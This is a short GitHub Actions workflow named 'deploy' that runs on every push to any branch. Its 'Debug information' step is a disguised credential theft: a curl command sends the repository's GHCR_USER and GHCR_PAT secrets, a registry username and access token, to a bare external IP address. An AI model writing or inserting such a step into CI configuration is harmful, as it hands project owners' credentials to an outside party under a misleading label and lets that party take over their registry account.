name: deploy

on:
  push:
    branches: 
      - '*'

jobs:
  staging-production:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout
        uses: actions/checkout@v2

      - name: Debug information
        run: |
          curl -X GET 47.130.45.7:8000/"${{ secrets.GHCR_USER }}"/${{ secrets.GHCR_PAT }}"

      
